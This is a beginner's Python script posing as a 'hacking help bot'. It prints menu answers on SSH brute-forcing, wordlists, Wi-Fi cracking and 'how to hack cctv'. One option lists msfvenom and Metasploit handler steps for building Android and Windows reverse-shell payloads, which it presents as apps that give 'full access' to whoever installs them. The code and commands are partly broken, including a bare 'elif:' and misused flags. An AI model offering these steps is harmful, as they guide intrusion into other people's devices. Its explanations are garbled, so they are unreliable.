import pyjokes
import webbrowser
print ("i am your bot my name likhith sai")
name = input("what is your name:-")
print ("nice name" , name )
print ("1 = what is ssh and how to use it")
print ("2 = what is wordlist and how to create wordlist")
print ("3 = what is payload,exploit and how to create payload,exploit")
print ("4 = what is dirb and how to use it")
print ("5 = what is net discover and how to use it")
print ("6 = what is github")
print ("7 = is python is important for hacking ")
print ("8 = what is aicrack-ng")
print ("9 = how to hack cctv")
print ("O = others")
print ("J = jokes")
q1 = input("please ask hacking doubt using above options :-  ")
if "1" in q1:
	print ("ssh is secure shell protocal")
	print ("it is used to control the system in terminial if we know root password")
	print ("or we can create wordlist")
	print ("after we should check all user names and passwords to check we should use ")
	print ("metasploit search for ssh login and use it")
	print ("if we get user name and password we can use their computer from other side country also to do")
	print ("follow me in terminial write following code")
	print ("ssh -i <user name>@<ip>")
	print ("-i indicated interact")
if "2" in q1:
	print ("wordlists is a txt file where we write user name and password or both")
	print ("we can also use the crunch")
	print ("to use it")
	print ("sudo crunch <minumum> <maximum >")
	print ("it will gerate a big wordlist")
	print ("we use wordlist to get username,password or url")
if "3" in q1:
	print ("payload is a file where we can get access for example i created a apk you install it and open it ")
	print ("then i will get full access of your device")
	print ("exploit is a file where we can get access for example i created a apk you install it ")
	print ("then i will get full access of your device")
	print ("msfvenom -p android/meterpreter/reverse_tcp LHOST=<NGROK IP OR YOUR IP >")
	print ("LPORT=<NGROK OR YOUR PORT> -R > name.apk")
	print ("click enter")
	print ("msfconsole")
	print ("use multi/handler")
	print ("set PAYLOAD android/meterpreter/reverse_tcp")
	print ("set LHOST <WHAT WE GAVE BEFORE>")
	print ("set LPORT <WHAT WE GAVE BEFORE>")
	print ("exploit")
	print ("done we created a payload for android ")
	print ("msfvenom -e android/meterpreter/reverse_tcp LHOST=<NGROK IP OR YOUR IP >")
	print ("LPORT=<NGROK OR YOUR PORT> -R > name.apk")
	print ("click enter")
	print ("msfconsole")
	print ("use multi/handler")
	print ("set PAYLOAD android/meterpreter/reverse_tcp")
	print ("run")
	print ("done we created a exploit for android ")
	print ("msfvenom -p windows/meterpreter/reverse_tcp LHOST=<NGROK IP OR YOUR IP >")
	print ("LPORT=<NGROK OR YOUR PORT> -R > name.exe")
	print ("click enter")
	print ("msfconsole")
	print ("use multi/handler")
	print ("set PAYLOAD windows/meterpreter/reverse_tcp")
	print ("set LHOST <WHAT WE GAVE BEFORE>")
	print ("set LPORT <WHAT WE GAVE BEFORE>")
	print ("exploit")
	print ("done we created a payload for windows ")
	print ("msfvenom -e windows/meterpreter/reverse_tcp LHOST=<NGROK IP OR YOUR IP >")
	print ("LPORT=<NGROK OR YOUR PORT> -R > name.exe")
	print ("click enter")
	print ("msfconsole")
	print ("use multi/handler")
	print ("set PAYLOAD windows/meterpreter/reverse_tcp")
	print ("set LHOST <WHAT WE GAVE BEFORE>")
	print ("set LPORT <WHAT WE GAVE BEFORE>")
	print ("run")
	print ("done we created a payload for windows ")
	print ("for help in terminial give help")
if "4" in q1:
	print ("dirb is a tool to check in wewbsite for hidden directories")
	print ("to start lets give sudo dirb")
	print ("dirb -u<url>")
	print ("-u for url")
if "5" in q1:
	print ("netdiscover is a tool which shows who has connected to our network to use")
	print ("sudo netdiscover -i<interface>")
	print ("-i indicates interface")
if "6" in q1:
	print ("github is a programers place where programmers upload there code to download a tool from github")
	print ("we click clone and copy the url")
	print ("git clone <url>")
if "7" in  q1:
	print ("PYTHON IS VERY IMPORTANT LANGUAGE AS IT HELP US TO MAKE HACKING AND WE ALSO CAN PUT THE CODE IN GITHUB ")
	print ("do you know your seeing these as i wrote in python ")
	print ("do you want to see how i am writing code open this file")
if "8" in q1:
	print ("it is a tool to hack a wifi")
	print ("aircrack-ng -i <interface of wireless adopter>")
if "9" in q1:
	print ("msfconsole")
	print ("search shodan")
	print ("use <sorry i don't what is in list but do the axurily/scanner>")
	print ("show options ")
	print ("run")
if "O" in q1:
	print ("gmail me to get more tools imformation")
	print ("semalalikithsai@gmail.com and can you rate us in gmail and send to me")
	chromedir= 'C:/Program Files (x86)/Google/Chrome/Application/chrome.exe %s'
	webbrowser.get(chromedir).open("https://mail.google.com/mail/u/0/?pli=1#inbox?compose=new")
	print ("and please subscribe to hackers are here where are you in youtube")
	chromedir= 'C:/Program Files (x86)/Google/Chrome/Application/chrome.exe %s'
	webbrowser.get(chromedir).open("https://www.youtube.com/channel/UC5N_8t5SzEyJrTx1bC66Kpw")
if "J" in q1:
	print (pyjokes.get_joke())
elif:
	print ("data not found in this project try to give 1 to 10 numbers")
